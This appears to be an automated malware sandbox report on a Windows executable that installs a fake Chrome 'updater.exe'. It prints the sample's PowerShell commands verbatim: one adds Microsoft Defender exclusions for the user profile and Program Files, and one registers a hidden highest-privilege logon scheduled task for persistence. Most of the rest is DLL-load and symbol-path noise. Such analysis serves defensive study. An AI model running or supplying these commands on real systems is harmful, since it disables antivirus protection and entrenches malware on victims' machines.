Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB31AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString, 4_2_00007FF78AB31AC4
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB32328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx, 4_2_00007FF78AB32328
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe File created: C:\Users\user\AppData\Roaming\Google
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe File created: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp
Source: ylVAEHbMLf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ylVAEHbMLf.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe File read: C:\Users\user\Desktop\ylVAEHbMLf.exe
Source: unknown Process created: C:\Users\user\Desktop\ylVAEHbMLf.exe "C:\Users\user\Desktop\ylVAEHbMLf.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: ylVAEHbMLf.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: ylVAEHbMLf.exe Static file information: File size 5980672 > 1048576
Source: ylVAEHbMLf.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x592e00
Source: ylVAEHbMLf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
